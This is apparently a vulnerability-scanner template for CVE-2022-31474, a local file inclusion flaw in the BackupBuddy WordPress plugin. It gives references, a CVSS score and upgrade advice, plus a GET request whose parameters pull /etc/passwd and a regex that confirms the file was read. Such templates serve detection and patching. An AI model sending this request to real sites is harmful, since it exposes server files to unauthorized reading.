id: CVE-2022-31474 info: name: BackupBuddy - Local File Inclusion author: aringo severity: high description: BackupBuddy versions 8.5.8.0 - 8.7.4.1 are vulnerable to a local file inclusion vulnerability via the 'download' and 'local-destination-id' parameters. reference: - https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/ - https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy - https://ithemes.com/backupbuddy/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31474 remediation: Upgrade to at least version 8.7.5 or higher classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-31474 cwe-id: CWE-22 cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:*:*:* epss-score: 0.00382 tags: cve,cve2022,wordpress,wp-plugin,wp,lfi,backupbuddy metadata: max-request: 1 http: - method: GET path: - "{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # Enhanced by cs 2022/09/14